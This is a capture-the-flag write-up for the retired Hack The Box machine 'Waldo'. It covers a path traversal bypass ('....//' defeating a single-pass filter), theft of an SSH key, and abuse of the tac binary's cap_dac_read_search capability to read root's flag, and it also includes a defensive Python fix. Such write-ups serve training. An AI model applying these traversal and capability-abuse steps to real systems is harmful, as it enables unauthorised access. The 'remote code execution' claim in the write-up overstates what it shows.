Waldo – Hackthebox.eu

Box just got retired. For the points it gets on HTB.eu, I found it quite challenging…

Enumeration

As always, nmap to get going:

sudo nmap -sC -sV -oA inital -p- 10.10.10.87
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-10 08:50 UTC
Nmap scan report for 10.10.10.87
Host is up (0.068s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
| 2048 c4:ff:81:aa:ac:df:66:9e:da:e1:c8:78:00:ab:32:9e (RSA)
| 256 b3:e7:54:6a:16:bd:c9:29:1f:4a:8c:cd:4c:01:24:27 (ECDSA)
|_ 256 38:64:ac:57:56:44:d5:69:de:74:a8:88:dc:a0:b4:fd (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
| http-title: List Manager
|_Requested resource was /list.html
|_http-trane-info: Problem with XML parsing of /evox/about
8888/tcp filtered sun-answerbook

We got HTTP (80), SSH (22) and some weird sun-answerbook port (8888, filtered). Let's try browsing the site.

Looks like we need to find Waldo :). I initially got stuck here. Nothing seemed to work in terms of PHP, traversals, etc. Using Burp, I found out that there are 4 commands that are issued by the site:

1. fileRead

2. fileWrite

3. fileDelete

4. dirRead

I really like this challenge, because I needed to start using Burp in ways I hadn’t before, as noted above. I then proceeded to look into what fileRead.php actually does:

OK, so it reads files. No surprise there. Let's see what happens if I use it to read the file itself:

Now I understand why the dir traversal didn't work! The .php calls str_replace to strip ../ (and ..\ or similar) from the file name:

// as returned by fileRead.php, with the JSON escaping removed
$_POST['file'] = str_replace( array("../", "..\""), "", $_POST['file']);

Nifty! But something you can work around by using ....// instead of ../. With ....//, the inner ../ is removed once, leaving just ../ because the replace only runs a single pass. See below!

Error... Now replace the ../ with ....//
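To show why the single-pass filter fails and what a proper check looks like, here is an added example of my own (not the box's fileRead.php) that models the str_replace() logic in Python and contrasts it with a base-directory check; the base directory /srv/app is an assumed value.

```python
import os
from typing import Optional

# Assumed web root for the example; fileRead.php's real directory is not shown on the page.
BASE_DIR = "/srv/app"


def weak_filter(name: str) -> str:
    """Mimics str_replace(array("../", "..\\"), "", $_POST['file']):
    each pattern is removed exactly once, left to right, with no second pass."""
    return name.replace("../", "").replace("..\\", "")


def still_traverses(name: str) -> bool:
    """True if a name that passed weak_filter() still climbs a directory."""
    return "../" in weak_filter(name)


def repeated_filter(name: str) -> str:
    """Minimal fix for the filter itself: keep replacing until nothing changes,
    so ....// collapses all the way instead of leaving ../ behind.
    Still does not handle absolute paths, so prefer safe_resolve()."""
    prev = None
    while prev != name:
        prev, name = name, name.replace("../", "").replace("..\\", "")
    return name


def safe_resolve(base_dir: str, name: str) -> Optional[str]:
    """Hardened check: resolve the requested name under base_dir and reject
    anything whose real path ends up outside it (covers ../, ....//,
    absolute paths and symlinks alike)."""
    base = os.path.realpath(base_dir)
    # os.path.join() discards base when name is absolute, which the check below catches.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```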

Remote code execution! Awesome! Let's see what we can do if we use dirRead.php instead of fileRead.php.

Cool, using this command I did some reconnaissance of the box. I found that there is a directory called .dockerenv, which must mean that the site is running in a Docker container.

On to the folder with the authorized keys. The .monitor file looks really interesting.

Make sure to replace the literal \n sequences with real newlines, because they come through the script as escaped characters. We have an SSH key. Let's see what we can do with it.

ssh -i monitor [email protected]
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.
waldo:~$ whoami
nobody


Exploitation

This is actually where I got stuck for a while. There are no strange services running, no sticky bits, no weird users, nothing. Then I realized that I am in a Docker container. Maybe I can just use the key to log in to localhost:

Hello Waldo!

Privilege escalation

Next up is to enumerate again. But first I need a shell I can use without restrictions. You can use -t to:

Force pseudo-terminal allocation. This can be used to execute
arbitrary screen-based programs on a remote machine, which can be
very useful, e.g. when implementing menu services. Multiple -t
options force tty allocation, even if ssh has no local tty.

So let's see if we can get a bash shell with this:

waldo:~$ ssh -i .ssh/.monitor [email protected] -t bash
[email protected]:~$

And again, I got stuck for quite a while after that. I then sent over LinEnum as described in the Hawk write-up. Initially it didn't show anything, until I ran the thorough version. After talking to some friends and colleagues, one of them pointed me at file capabilities. I had honestly never heard of them up until that moment. However, this does not work out of the box with the shell I've got, because PATH is nearly empty, so I need to set it first:

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:$PATH

Most interesting part of the LinEnum.sh now is:

-e [+] Files with POSIX capabilities set:
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

After looking into tac, it seemed that I could use it to read root.txt, since cap_dac_read_search lets it bypass file read permission checks.

[email protected]:/tmp$ /usr/bin/tac /root/root.txt

8fb67c84418be6e45fbd348fd4584f

Finally! Man, this was a hard box :). Learned so much, this is why I am doing these CTFs.

ippsec video on this box